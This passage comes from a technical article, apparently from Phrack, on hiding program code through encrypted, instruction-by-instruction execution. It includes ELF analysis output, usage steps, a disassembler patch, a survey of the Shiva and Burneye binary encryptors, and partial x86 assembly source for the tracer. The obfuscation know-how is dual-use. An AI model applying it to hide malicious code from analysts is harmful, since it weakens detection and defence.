+ 81: 0804fdf0      0 NOTYPE  LOCAL   DEFAULT   13 control_table
+ 82: 0804fc20      0 NOTYPE  LOCAL   DEFAULT   13 _unhandled
+ 83: 0804fc21      0 NOTYPE  LOCAL   DEFAULT   13 _nonjump
+ 84: 0804fc33      0 NOTYPE  LOCAL   DEFAULT   13 .execute
+ 85: 0804fc55      0 NOTYPE  LOCAL   DEFAULT   13 _jcc_rel8
+ 86: 0804fc5e      0 NOTYPE  LOCAL   DEFAULT   13 _jcc_rel32
+ 87: 0804fc65      0 NOTYPE  LOCAL   DEFAULT   13 ._jcc_rel32_insn
+ 88: 0804fc71      0 NOTYPE  LOCAL   DEFAULT   13 ._jcc_rel32_true
+ 89: 0804fc6b      0 NOTYPE  LOCAL   DEFAULT   13 ._jcc_rel32_false
+ 90: 0804fc72      0 NOTYPE  LOCAL   DEFAULT   13 rel_offset_fixup
+ 91: 0804fc7d      0 NOTYPE  LOCAL   DEFAULT   13 _retn
+ 92: 0804fca6      0 NOTYPE  LOCAL   DEFAULT   13 ._endtrace
+ 93: 0804fcbe      0 NOTYPE  LOCAL   DEFAULT   13 _loopne
+ 94: 0804fce0      0 NOTYPE  LOCAL   DEFAULT   13 ._loop_insn
+ 95: 0804fcd7      0 NOTYPE  LOCAL   DEFAULT   13 ._doloop
+ 96: 0804fcc7      0 NOTYPE  LOCAL   DEFAULT   13 _loope
+ 97: 0804fcd0      0 NOTYPE  LOCAL   DEFAULT   13 _loop
+ 98: 0804fcec      0 NOTYPE  LOCAL   DEFAULT   13 ._loop_insn_true
+ 99: 0804fce2      0 NOTYPE  LOCAL   DEFAULT   13 ._loop_insn_false
+100: 0804fcf6      0 NOTYPE  LOCAL   DEFAULT   13 _jcxz
+101: 0804fd0a      0 NOTYPE  LOCAL   DEFAULT   13 _callrel
+102: 0804fd0f      0 NOTYPE  LOCAL   DEFAULT   13 _call
+103: 0804fd38      0 NOTYPE  LOCAL   DEFAULT   13 _jmp_rel8
+104: 0804fd41      0 NOTYPE  LOCAL   DEFAULT   13 _jmp_rel32
+105: 0804fd49      0 NOTYPE  LOCAL   DEFAULT   13 _grp5
+106: 0804fda4      0 NOTYPE  LOCAL   DEFAULT   13 ._grp5_continue
+107: 08050bdc      0 NOTYPE  LOCAL   DEFAULT   20 our_esp
+108: 0804fdc9      0 NOTYPE  LOCAL   DEFAULT   13 ._grp5_call
+109: 0804fdd0      0 NOTYPE  LOCAL   DEFAULT   13 _0xf
+110: 08050be4      0 NOTYPE  LOCAL   DEFAULT   20 local_stk
+111: 00000000      0 FILE    LOCAL   DEFAULT   ABS xde.c
+112: 0804b419      0 NOTYPE  GLOBAL  DEFAULT   10 crypt_exec
+113: 08048484     57 FUNC    GLOBAL  DEFAULT   UND printf
+114: 08050aa4      0 OBJECT  GLOBAL  DEFAULT   ABS _DYNAMIC
+115: 08048494      0 FUNC    GLOBAL  DEFAULT   UND memcpy
+116: 0804b684   4662 FUNC    GLOBAL  DEFAULT   10 xde_disasm
+117: 08050b98      4 OBJECT  GLOBAL  DEFAULT   20 __stderrp
+118: 0804fc04      0 OBJECT  GLOBAL  HIDDEN    13 __dso_handle
+119: 0804b504    384 FUNC    GLOBAL  DEFAULT   10 reg2xset
+120: 08048468      0 FUNC    GLOBAL  DEFAULT    8 _init
+121: 0804c8bc    364 FUNC    GLOBAL  DEFAULT   10 xde_asm
+122: 08051c74      4 OBJECT   GLOBAL DEFAULT   20 environ
+123: 080484a4     52 FUNC     GLOBAL DEFAULT   UND fprintf
+124: 00000000      0 NOTYPE   WEAK   DEFAULT   UND __deregister_frame..
+125: 0804fc00      4 OBJECT   GLOBAL DEFAULT   13 __progname
+126: 08048520    141 FUNC     GLOBAL DEFAULT   10 _start
+127: 0804b258    431 FUNC     GLOBAL DEFAULT   10 cast5_setkey
+128: 080484b4    172 FUNC     GLOBAL DEFAULT   UND sscanf
+129: 08050b98      0 NOTYPE   GLOBAL DEFAULT   ABS __bss_start
+130: 080484c4      0 FUNC     GLOBAL DEFAULT   UND memset
+131: 080487c0    318 FUNC     GLOBAL DEFAULT   10 main
+132: 0804ca64      0 FUNC     GLOBAL DEFAULT   11 _fini
+133: 080484d4    337 FUNC     GLOBAL DEFAULT   UND atexit
+134: 080484e4    121 FUNC     GLOBAL DEFAULT   UND scanf
+135: 08050200   2208 OBJECT   GLOBAL DEFAULT   13 xde_table
+136: 08050b98      0 NOTYPE   GLOBAL DEFAULT   ABS _edata
+137: 08050b68      0 OBJECT   GLOBAL DEFAULT   ABS _GLOBAL_OFFSET_TABLE_
+138: 08051c78      0 NOTYPE   GLOBAL DEFAULT   ABS _end
+139: 08049660   3421 FUNC     GLOBAL DEFAULT   10 cast5_decrypt
+140: 080484f4    101 FUNC     GLOBAL DEFAULT   UND exit
+141: 08048900   3421 FUNC     GLOBAL DEFAULT   10 cast5_encrypt
+142: 08048504      0 FUNC     GLOBAL DEFAULT   UND strlen
+143: 00000000      0 NOTYPE   WEAK   DEFAULT   UND _Jv_RegisterClasses
+144: 00000000      0 NOTYPE   WEAK   DEFAULT   UND __register_frame_info
+
+    We see that function f1 has address 0x8048660 and size 75 = 0x4B. 
+Function f2 has address 0x80486B0 and size 58 = 3A. Simple calculation 
+shows that they are in fact consecutive in memory so we don't have to 
+encrypt them separately but in a single block ranging from 0x8048660 to 
+0x80486F0.
+
+$ readelf -l test2
+
+Elf file type is EXEC (Executable file)
+Entry point 0x8048520
+There are 6 program headers, starting at offset 52
+
+Program Headers:
+Type            Offset    VirtAddr    PhysAddr    FileSiz MemSiz
+Flg Align
+PHDR           0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
+INTERP         0x0000f4 0x080480f4 0x080480f4 0x00019 0x00019 R   0x1
+    [Requesting program interpreter: /usr/libexec/ld-elf.so.1]
+LOAD           0x000000 0x08048000 0x08048000 0x06bed 0x06bed R E 0x1000
+LOAD           0x006c00 0x0804fc00 0x0804fc00 0x00f98 0x02078 RW  0x1000
+DYNAMIC        0x007aa4 0x08050aa4 0x08050aa4 0x000b0 0x000b0 RW  0x4
+NOTE           0x000110 0x08048110 0x08048110 0x00018 0x00018 R   0x4
+
+ Section to Segment mapping:
+Segment Sections...
+ 00
+ 01     .interp
+ 02     .interp .note.ABI-tag .hash .dynsym .dynstr .rel.dyn .rel.plt
+         .init .plt .text .fini .rodata
+ 03     .data .eh_frame .dynamic .ctors .dtors .jcr .got .bss
+ 04     .dynamic
+ 05     .note.ABI-tag
+
+>From this we see that both addresses (0x8048660 and 0x80486F0) fall into
+the first LOAD segment which is loaded at VirtAddr 0x804800 and is placed
+at offset 0 in the file. Therefore, to map virtual address to file offset
+we simply subtract 0x8048000 from each address giving 0x660 = 1632 and
+0x6F0 = 1776.
+
+    If you obtain ELFsh [7] then you can make your life much easier. The
+following transcript shows how ELFsh can be used to obtain the same
+information:
+
+$ elfsh
+
+       Welcome to The ELF shell 0.51b3 .::.
+
+       .::. This software is under the General Public License
+       .::. Please visit http://www.gnu.org to know about Free Software
+
+[ELFsh-0.51b3]$ load test2
+
+ [*] New object test2 loaded on Mon Jun 13 20:45:33 2005
+
+[ELFsh-0.51b3]$ sym f1
+
+ [SYMBOL TABLE]
+ [Object test2]
+
+ [059] 0x8048680   FUNCTION f1
+ size:0000000075 foffset:001632 scope:Local   sctndx:10 => .text + 304
+
+[ELFsh-0.51b3]$ sym f2
+
+ [SYMBOL TABLE]
+ [Object test2]
+
+ [060] 0x80486d0   FUNCTION f2
+ size:0000000058 foffset:001776 scope:Local   sctndx:10 => .text + 384
+
+[ELFsh-0.51b3]$ exit
+
+ [*] Unloading object 1 (test2) *
+
+       Good bye ! .::. The ELF shell 0.51b3
+
+    The field foffset gives the symbol offset within the executable, while
+size is its size. Here all the numbers are decimal.
+
+    Now we are ready to encrypt a part of the executable with a very
+'imaginative' password and then test the program:
+
+$ echo -n "password" | openssl md5
+5f4dcc3b5aa765d61d8327deb882cf99
+$ ./cryptfile -e test2 5f4dcc3b5aa765d61d8327deb882cf99 1632 1776
+$ chmod +x test2.crypt
+$ ./test2.crypt
+
+    At the prompt enter the same hex string and then enter numbers 12 and 
+34 for a and b. The result must be 1662, and esp before and after must be
+the same.
+
+    Once you are sure that the program works correctly, you can strip(1)
+symbols from it.
+
+
+----[ 3.4 - XDE bug
+
+
+    During the development,  a I have found a bug in the XDE disassembler
+engine: it didn't correctly handle the LOCK (0xF0) prefix. Because of the
+bug XDE claimed that 0xF0 is a single-byte instruction. This is the
+needed patch to correct the disassembler:
+
+--- xde.c       Sun Apr 11 02:52:30 2004
++++ xde_new.c   Mon Aug 23 08:49:00 2004
+@@ -101,6 +101,8 @@
+   if (c == 0xF0)
+   {
+     if (diza->p_lock != 0) flag |= C_BAD;      /* twice */
++       diza->p_lock = c;
++       continue;
+   }
+
+   break;
+
+    I also needed to remove __cdecl on functions, a 'feature' of Win32 C
+compilers not needed on UNIX platforms.
+
+
+----[ 3.5 - Limitations
+
+
+o XDE engine (probably) can't handle new instructions (SSE, MMX, etc.).
+  For certain it can't handle 3dNow! because they begin with 0x0F 0x0F,
+  a byte sequence for which the XDE claims is an invalid instruction
+  encoding.
+
+o The tracer shares the same memory with the traced program. If the traced
+  program is so badly broken that it writes to (random) memory it doesn't
+  own, it can stumble upon and overwrite portions of the tracing routine.
+
+o Each form of tracing has its own speed impacts. I didn't measure how
+  much this method slows down program execution (especially compared to
+  ptrace()).
+
+o Doesn't handle even all 386 instructions (most notably far calls/jumps
+  and RET imm16).  In this case the tracer stops with HLT which should
+  cause GPF under any OS that runs user processes in rings other than 0.
+
+o The block size of 8 bytes is hardcoded in many places in the program.
+  The source (both C and ASM) should be parametrized by some kind of
+  BLOCKSIZE #define.
+
+o The tracing routine is not reentrant! Meaning, any code being executed
+  by crypt_exec can't call again crypt_exec because it will overwrite its
+  own context!
+
+o The code itself isn't optimal:
+    - identity_decrypt could use 4-byte moves.
+    - More registers could be used to minimize memory references.
+
+
+----[ 3.6 - Porting considerations
+
+
+    This is as heavy as it gets - there isn't a single piece of machine-
+independent code in the main routine that could be used on an another
+processor architecture. I believe that porting shouldn't be too difficult,
+mostly rewriting the mechanics of the current program. Some points to
+watch out for include:
+
+o Be sure to handle all control flow instructions.
+
+o Move instructions could affect processor flags.
+
+o Write a disassembly routine. Most RISC architectures have regular
+  instruction set and should be far easier to disassemble than x86 code.
+
+o This is self-modifying code: flushing the instruction prefetch queue
+  might be needed.
+
+o Handle delayed jumps and loads if the architecture provides them. This
+  could be tricky.
+
+o You might need to get around page protections before calling the
+  decryptor (non-executable data segments).
+
+    Due to unavailability of non-x86 hardware I wasn't able to implement 
+the decryptor on another processor.
+
+
+--[ 4 - Further ideas
+
+
+o Better  encryption  scheme.   ECB  mode  is  bad,  especially  with
+  small block size of 8 bytes. Possible alternative is the following:
+
+    1.  Round the traced_eip down to a multiple of 8 bytes.
+    2.  Encrypt the result with the key.
+    3.  Xor the result with the instruction bytes.
+
+  That way the encryption depends on the location in memory. Decryption
+  works the same way.  However, it would complicate cryptfile.c program.
+
+o Encrypted data. Devise a transparent (for the C programmer) way to
+  access the encrypted data. At least two approaches come to mind:
+  1)  playing  with  page  mappings  and  handling  read/write  faults,
+  or 2) use XDE to decode all accesses to memory and perform encryption
+  or decryption, depending on the type of access (read or write). The
+  first approach seems too slow (many context switches per data read)
+  to be practical.
+
+o New instruction sets and architectures. Expand XDE to handle new x86
+  instructions. Port the routine to architectures other than i386 (first
+  comes to mind AMD64, then ARM, SPARC...).
+
+o Perform decryption on the smart card. This is slow, but there is no
+  danger of key compromise.
+
+o Polymorphic decryption engine.
+
+
+----[ 5 - Related Work
+
+
+This section gives a brief overview of existing work, either because of
+similarity in coding techniques (ELFsh and tracing without ptrace) or
+because of the code protection aspect.
+
+
+5.1 ELFsh
+---------
+
+The ELFsh crew's article on elfsh and e2dbg [7], also in this Phrack
+issue.  A common point in our work is the approach to program tracing
+without using ptrace(2). Their latest work is a scriptable embedded ELF
+debugger, e2dbg. They are also getting around PaX protections, an issue I
+didn't even take into account.
+
+
+5.2 Shiva
+---------
+
+The Shiva binary encryptor [8], released in binary-only form. It tries
+really hard to prevent reverse engineering by including features such as
+trap flag detection, ptrace() defense, demand-mapped blocks (so that
+fully decrpyted image can't be dumped via /proc), using int3 to emulate
+some instructions, and by encryption in layers. The 2nd, password
+protected layer, is optional and encrypted using 128-bit AES. Layer 3
+encryption uses TEA, the tiny encryption algorithm.
+
+According to the analysis in [9], "for sufficiently large programs, no
+more than 1/3 of the program will be decrypted at any given time". This
+is MUCH larger amount of decrypted program text than in my case: 24
+bytes, independent of any external factors. Also, Shiva is heavily
+tied to the ELF format, while my method is not tied to any operating
+system or executable format (although the current code IS limited to
+the 32-bit x86 architecture).
+
+
+5.3 Burneye
+-----------
+
+There are actually two tools released by team-teso: burneye and burneye2
+(objobf) [10].
+
+Burneye is a powerful binary encryption tool. Similarly to Shiva, it has
+three layers: 1) obfuscation, 2) password-based encryption using RC4 and
+SHA1 (for generating the key from passphrase), and 3) the fingerprinting
+layer.
+
+The fingerprinting layer is the most interesting one: the data about the
+target system is collected (e.g. amount of memory, etc..) and made into
+a 'fingeprint'. The executable is encrypted taking the fingerprint into
+account so that the resulting binary can be run only on the host with the
+given fingerprint. There are two fingerprinting options:
+
+o Fingeprint tolerance can be specified so that Small deviations are
+  allowed. That way, for example, the memory can be upgraded on the
+  target system and the executable will still work. If the number of
+  differences in the fingeprint is too large, the program won't work.
+
+o Seal: the program produced with this option will run on any system.
+  However, the first time it is run, it creats a fingerprint of the
+  host and 'seals' itself to that host. The original seal binary is
+  securely deleted afterwards.
+
+The encrypted binary can also be made to delete itself when a certain
+environment variable is set during the program execution.
+
+objobf is just relocatable object obfuscator. There is no encryption
+layer. The input is an ordinary relocatable object and the output is
+transformed, obfuscated, and functionally equivalent code. Code
+transformations include: inserting junk instructions, randomizing the
+order of basic blocks, and splitting basic blocks at random points.
+
+
+5.4 Conclusion
+--------------
+
+Highlights of the distinguishing features of the code encryption
+technique presented here:
+
+o Very small amount of plaintext code in memory at any time - only 24
+  bytes. Other tools leave much more plain-text code in memory.
+
+o No special loaders or executable format manipulations are needed. There
+  is one simple utility that encrypts the existing code in-place. It is
+  executable format-independent since its arguments are function offsets
+  within the executable (which map to function addresses in runtime).
+
+o The code is tied to the 32-bit x86 architecture, however it should be
+  portable without changes to any operating system running on x86-32.
+  Special arrangements for setting up page protections may be necessary
+  if PaX or NX is in effect.
+
+On the downside, the current version of the engine is very vulnerable
+with respect to reverse-engineering. It can be easily recognized by
+scanning for fixed sequences of instructions (the decryption routine).
+Once the decryptor is located, it is easy to monitor a few fixed memory
+addresses to obtain both the EIP and the original instruction residing at
+that EIP. The key material data is easy to obtain, but this is the case
+in ANY approach using in-memory keys.
+
+However, the decryptor in its current form has one advantage: since it is
+ordinary code that does no special tricks, it should be easy to combine
+it with a tool that is more resilient to reverse-engineering, like Shiva
+or Burneye.
+
+
+----[ 6 - References
+
+
+1.  Phrack magazine.
+    http://www.phrack.org
+
+2.  ptrace tutorials:
+    http://linuxgazette.net/issue81/sandeep.html
+    http://linuxgazette.net/issue83/sandeep.html
+    http://linuxgazette.net/issue85/sandeep.html
+
+3.  D. E. Knuth:  The Art of Computer Programming, vol.1:  Fundamental
+    Algorithms.
+
+4.  Fenris.
+    http://lcamtuf.coredump.cx/fenris/whatis.shtml
+
+5.  XDE.
+    http://z0mbie.host.sk
+
+6.  Source code for described programs. The source I have written is
+    released under MIT license.  Other files have different licenses. The
+    archive also contains a patched version of XDE.
+    http://www.core-dump.com.hr/software/cryptexec.tar.gz
+
+7.  ELFsh, the ELF shell. A powerful program for manipulating ELF files.
+    http://elfsh.devhell.org
+
+8.  Shiva binary encryptor.
+    http://www.securereality.com.au
+
+9.  Reverse Engineering Shiva.
+    http://blackhat.com/presentations/bh-federal-03/bh-federal-03-eagle/
+     bh-fed-03-eagle.pdf
+
+10. Burneye and Burneye2 (objobf).
+    http://packetstormsecurity.org/groups/teso/indexsize.html
+
+
+----[ 7 - Credits
+
+Thanks go to mayhem who has reviewed this article. His suggestions were
+very helpful, making the text much more mature than the original.
+
+
+--[ A - Appendix: Source code
+    Here I'm providing only my own source code. The complete source package
+can be obtained from [6]. It includes:
+
+o All source listed here,
+o the patched XDE disassembler, and
+o the source of the CAST5 cryptographic algorithm.
+
+
+----[ A.1 - The tracer source: crypt_exec.S
+
+
+/*
+Copyright (c) 2004 Zeljko Vrba
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to permit
+persons to whom the Software is furnished to do so, subject to the
+following conditions:
+
+The above copyright notice and this permission notice shall be included
+in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT
+OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
+THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+*/
+
+.text
+
+/************************************************************************
+ * void *crypt_exec(
+ *   decrypt_fn_ptr dfn, const void *key,
+ *   const void *lo_addr, const void *hi_addr,
+ *   const void *addr, ...)
+ * typedef (*decrypt_fn_ptr)(
+ *   void *key, unsigned char *dst, const unsigned char *src);
+ *
+ * - dfn is pointer to deccryption function
+ * - key is pointer to crypt routine key data
+ * - addr is the addres where execution should begin. due to the way the
+ *   code is decrypted and executed, it MUST be aligned to 8 (BLOCKSIZE)
+ *   bytes!!
+ * - the rest are arguments to called function
+ *
+ * The crypt_exec stops when the stack pointer becomes equal to what it
+ * was on entry, and executing 'ret' would cause the called function to
+ * exit. This works assuming normal C compiled code.
+ *
+ * Returns the value the function would normally return.
+ *
+ * This code calls:
+ * int xde_disasm(unsigned char *ip, struct xde_instr *outbuf);
+ * XDE disassembler engine is compiled and used with PACKED structure!
+ *
+ * It is assumed that the encryption algorithm uses 64-bit block size.
+ * Very good protection could be done if decryption is executed on the
+ * SMART CARD.
+ *
+ * Some terminology:
+ * 'Traced' refers to the original program being executed instruction by
+ * instruction. The technique used resembles Knuth's tracing routine (and
+ * indeed, we get true tracing when decryption is dropped).
+ *
+ * 'Our' refers to our data stack, etc.
+ *
+ * TODOs and limitations:
+ * - some instructions are not emulated (FAR CALL/JMP/RET, RET NEAR imm16)
+ * - LOOP* and JCXZ opcodes haven't been tested
+ * - _jcc_rel32 has been tested only indirectly by _jcc_rel8
+ ***********************************************************************/
+
+/*
+  Offsets into xde_instr struct.
+*/
+#define OPCODE  23
+#define OPCODE2 24
+#define MODRM   25
+
+/*
+ Set up our stack and save traced context. The context is saved at the end
+ of our stack.
+*/
+#define SAVE_TRACED_CONTEXT \
+    movl %esp, traced_esp   ;\
+    movl $stk_end, %esp     ;\
+    pusha                   ;\
+    pushf
+
+/*
+ Restore traced context from the current top of stack. After that restores
+ traced stack pointer.
+*/
+#define RESTORE_TRACED_CONTEXT \
+    popf                    ;\
+    popa                    ;\
+    movl traced_esp, %esp
+
+/*
+ Identity decryption routine. This just copies 8 bytes (BLOCKSIZE) from
+ source to destination. Has normal C calling convention. Is not global.
+*/
+identity_decrypt:
+    movl 8(%esp), %edi              /* destination address */
+    movl 12(%esp), %esi             /* source address */
+    movl $8, %ecx                   /* 8 bytes */
+    cld
+    rep movsb
+    ret
+
+crypt_exec:
+.globl crypt_exec
+.extern disasm
+
+    /*
+     Fetch all arguments. We are called from C and not expected to save
+     registers. This is the stack on entry:
+     [ ret_addr dfn key lo_addr hi_addr addr ...args ]
+    */
+    popl %eax                       /* return address */
+    popl r_decrypt                  /* real decryption function pointer */
+    popl key                        /* encryption key */
+    popl lo_addr                    /* low traced eip */
+    popl hi_addr                    /* high traced eip */
+    popl traced_eip                 /* eip to start tracing */
+    pushl %eax                      /* put return addr to stack again */
+
+    /*
+     now the stack frame resembles as if inner function (starting at
+     traced_eip) were called by normal C calling convention (after return
+     address, the vararg arguments folow)
+    */
+    movl %esp, end_esp              /* this is used to stop tracing. */
+    movl $0, traced_ctr             /* reset counter of insns to 0 */
+
+decryptloop:
+    /*
+     This loop traces a single instruction.
+
+     The CONTEXT at the start of each iteration:
+     traced_eip: points to the next instruction in traced program
+
+     First what we ever do is switch to our own stack and store the traced
+     program's registers including eflags.
+
+     Instructions are encrypted in ECB mode in blocks of 8 bytes.
+     Therefore, we always must start decryption at the lower 8-byte
+     boundary. The total of three blocks (24) bytes are decrypted for one
+     instruction. This is due to alignment and maximum instruction length
+     constraints: if the instruction begins at addres that is congruent
+     to 7 mod 8 + 16 bytes maximum length (given some slack) gives
+     instruction span of three blocks.
+
+     Yeah, I know ECB sucks, but this is currently just a proof-of
+     concept.  Design something better for yourself if you need it.
+    */
+    SAVE_TRACED_CONTEXT
+
+decryptloop_nocontext:
+    /*
+     This loop entry point does not save traced context. It is used from
+     control transfer instruction emulation where we doall work ourselves
+     and don't use traced context.
+
+     The CONTEXT upon entry is the same as for decryptloop.
+
+     First decide whether to decrypt or just trace the plaintext code.
+    */
+    movl traced_eip, %eax
+    movl $identity_decrypt, %ebx    /* assume no decryption */
+    cmpl lo_addr, %eax
+    jb .store_decrypt_ptr           /* traced_eip < lo_addr */
+    cmpl hi_addr, %eax
+    ja .store_decrypt_ptr           /* traced_eip > hi_addr */
+    movl r_decrypt, %ebx            /* in bounds, do decryption */
+.store_decrypt_ptr:
+    movl %ebx, decrypt
+
+    /*
+     Decrypt three blocks starting at eax, reusing arguments on the stack
+     for the total of 3 calls. WARNING! For this to work properly, the
+     decryption function MUST NOT modify its arguments!
+    */
+    andl $-8, %eax                  /* round down traced_eip to 8 bytes */
+    pushl %eax                      /* src buffer */
+    pushl $insn                     /* dst buffer */
+    pushl key                       /* key data pointer */
+    call *decrypt                   /* 1st block */
+    addl $8, 4(%esp)                /* advance dst */
+    addl $8, 8(%esp)                /* advance src */
+    call *decrypt                   /* 2nd block */
+    addl $8, 4(%esp)                /* advance dst */
+    addl $8, 8(%esp)                /* advance src */
+    call *decrypt                   /* 3rd block */
+    addl $12, %esp                  /* clear args from stack */
+
+    /*
+     Obtain the real start of instruction in the decrypted buffer. The
+     traced eip is taken modulo blocksize (8) and added to the start
+     address of decrypted buffer. Then XDE is called (standard C calling
+     convention) to get necessary information about the instruction.
+    */
+    movl traced_eip, %eax
+    andl $7, %eax                   /* traced_eip mod 8 */
+    addl $insn, %eax                /* offset within decrypted buffer */
+    pushl $disbuf                   /* address to disassemble into */
+    pushl %eax                      /* insn offset to disassemble */
+    call xde_disasm                 /* disassemble and return len */
+    movl %eax, ilen                 /* store instruction length */
+    popl %eax                       /* decrypted insn start */
+    popl %ebx                       /* clear remaining arg from stack */
+
+    /*
+     Calculate the offset in control table of the instruction handling
+     routine. Non-control transfer instructions are just executed in
+     traced context, other instructions are emulated.
+
+     Before executing the instruction, the traced eip is advanced by
+     instruction length, and the number of executed instructions is
+     incremented. We also append indirect 'jmp *continue' after the
+     instruction, to continue execution at appropriate place in our
+     tracing.  The JMP indirect opcodes are 0xFF 0x25.
+    */
+    movl ilen, %ebx
+    addl %ebx, traced_eip           /* advance traced eip */
+    incl traced_ctr                 /* increment counter */
+    movw $0x25FF, (%eax, %ebx)      /* JMP indirect; little-endian! */
+    movl $continue, 2(%eax, %ebx)   /* store address */
+    movzbl OPCODE+disbuf, %esi      /* load instruction byte */
+    jmp *control_table(,%esi,4)     /* execute by appropirate handler */
+
+.data
+    /*
+     Emulation routines start here. They are in data segment because code
+     segment isn't writable and we are modifying our own code. We don't
+     want yet to mess around with mprotect(). One day (non-exec page table
+     support on x86-64) it will have to be done anyway..
+
+     The CONTEXT upon entry on each emulation routine:
+     eax        : start of decrypted (CURRENT) insn addr to execute
+     ilen       : instruction length in bytes
+     stack top -> [traced: eflags edi esi ebp esp ebx edx ecx eax]
+     traced_esp : original program's esp
+     traced_eip : eip of next insn to execute (NOT of CURRENT insn!)
+    */
+
+_unhandled:
+    /*
+     Unhandled opcodes not normally generated by compiler. Once proper
+     emulation routine is written, they become handled :)
+
+     Executing privileged instruction, such as HLT, is the easiest way to
+     terminate the program. %eax holds the address of the instruction we
+     were trying to trace so it can be observed from debugger.
+    */
+     hlt
+
+_nonjump:
+    /*
+     Common emulation for all non-control transfer instructions.
+     Instruction buffer (insn) is already filled with decrypted blocks.
+
+     Decrypted instruction can begin in the middle of insn buffer, so the
+     relative jmp instruction is adjusted to jump to the traced insn,
+     skipping 'junk' at the beginning of insn.
+
+     When the instruction is executed, our execution continues at location
+     where 'continue' points to. Normally, this is decryptloop, but
+     occasionaly it is temporarily changed (e.g. in _grp5).
+    */
+    subl $insn, %eax                /* insn begin within insn buffer */
+    movb %al, .execute+1            /* update jmp instruction */
+    RESTORE_TRACED_CONTEXT
+.execute:
+    jmp insn                        /* relative, only offset adjusted */
+insn:
+    .fill 32, 1, 0x90
+
+_jcc_rel8:
+    /*
+     Relative 8-bit displacement conditional jump. It is handled by
+     relative 32-bit displacement jump, once offset is adjusted. Opcode
+     must also be adjusted: short jumps are 0x70-0x7F, long jumps are 0x0F
+     0x80-0x8F. (conditions correspond directly). Converting short to long
+     jump needs adding 0x10 to 2nd opcode.
+    */
+    movsbl 1(%eax), %ebx            /* load sign-extended offset */
+    movb (%eax), %cl                /* load instruction */
+    addb $0x10, %cl                 /* adjust opcode to long form */
+    /* drop processing to _jcc_rel32 as 32-bit displacement */
+
+_jcc_rel32:
+    /*
+     Emulate 32-bit conditional relative jump. We pop the traced flags,
+     let the Jcc instruction execute natively, and then adjust traced eip
+     ourselves, depending whether Jcc was taken or not.
+
+     CONTEXT:
+     ebx: jump offset, sign-extended to 32 bits
+     cl : real 2nd opcode of the instruction (1st is 0x0F escape)
+    */
+    movb %cl, ._jcc_rel32_insn+1    /* store opcode to instruction */
+    popf                            /* restore traced flags */
+
+._jcc_rel32_insn:
+    /*
+     Explicit coding of 32-bit relative conditional jump. It is executed
+     with the traced flags. Also the jump offset (32 bit) is supplied.
+    */
+    .byte 0x0F, 0x80
+    .long ._jcc_rel32_true - ._jcc_rel32_false
+
+._jcc_rel32_false:
+    /*
+     The Jcc condition was false. Just save traced flags and continue to
+     next instruction.
+    */
+    pushf
+    jmp decryptloop_nocontext
+
+._jcc_rel32_true:
+    /*
+     The Jcc condition was true. Traced flags are saved, and then the
+     execution falls through to the common eip offset-adjusting routine.
+    */
+    pushf
+
+rel_offset_fixup:
+    /*
+     Common entry point to fix up traced eip for relative control-flow
+     instructions.
+
+     CONTEXT:
+     traced_eip: already advanced to the would-be next instruction. this
+                 is done in decrypt_loop before transferring control to
+                 any insn-handler.
+     ebx       : sign-extended 32-bit offset to add to eip
+    */
+    addl %ebx, traced_eip
+    jmp decryptloop_nocontext
+
+_retn:
+    /*
+     Near return (without imm16). This is the place where the end-of
+     trace condition is checked. If, at this point, esp equals end_esp,
+     this means that the crypt_exec would return to its caller.
+    */
+    movl traced_esp, %ebp           /* compare curr traced esp to esp */
+    cmpl %ebp, end_esp              /* when crypt_exec caller's return */
+    je ._endtrace                   /* address was on top of the stack */
+
+    /*
+     Not equal, emulate ret.
+    */
+    movl %esp, %ebp                 /* save our current stack */
+    movl traced_esp, %esp           /* get traced stack */
+    popl traced_eip                 /* pop return address */
+    movl %esp, traced_esp           /* write back traced stack */
+    movl %ebp, %esp                 /* restore our current stack */
+    jmp decryptloop_nocontext
+
+._endtrace:
+    /*
+     Here the traced context is completely restored and RET is executed
+     natively. Our tracing routine is no longer in control after RET.
+     Regarding C calling convention, the caller of crypt_exec will get
+     the return value of traced function.
+
+     One detail we must watch for: the stack now looks like this:
+
+     stack top -> [ ret_addr ...args ]
+
+     but we have been called like this:
+
+     stack top -> [ ret_addr dfn key lo_addr hi_addr addr ...args ]
+
+     and this is what compiler expects when popping arg list. So we must
+     fix the stack. The stack pointer can be just adjusted by -20 instead
+     of reconstructing the previous state because C functions are free to
+     modify their arguments.
+
+     CONTEXT:
+     ebp: current traced esp
+    */
+    movl (%ebp), %ebx               /* return address */
+    subl $20, %ebp                  /* fake 5 extra args */
+    movl %ebx, (%ebp)               /* put ret addr on top of stack */
+    movl %ebp, traced_esp           /* store adjusted stack */
+    RESTORE_TRACED_CONTEXT
+    ret                             /* return without regaining control */
+
+    /*
+     LOOPNE, LOOPE and LOOP instructions are executed from the common
+     handler (_doloop). Only the instruction opcode is written from
+     separate handlers.
+
+     28 is the offset of traced ecx register that is saved on our stack.
+    */
+_loopne:
+    movb $0xE0, ._loop_insn         /* loopne opcode */
+    jmp ._doloop
+_loope:
+    movb $0xE1, ._loop_insn         /* loope opcode */
+    jmp ._doloop
+_loop:
+    movb $0xE2, ._loop_insn         /* loop opcode */
+._doloop:
+    /*
+     * Get traced context that is relevant for LOOP* execution: signed
+     * offset, traced ecx and traced flags.
+     */
+    movsbl 1(%eax), %ebx
+    movl 28(%esp), %ecx
+    popf
+
+._loop_insn:
+    /*
+     Explicit coding of loop instruction and offset.
+    */
+    .byte 0xE0                      /* LOOP* opcodes: E0, E1, E2 */
+    .byte ._loop_insn_true - ._loop_insn_false
+
+._loop_insn_false:
+    /*
+     LOOP* condition false. Save only modified context (flags and ecx)
+     and continue tracing.
+    */
+    pushf
+    movl %ecx, 28(%esp)
+    jmp decryptloop_nocontext
+
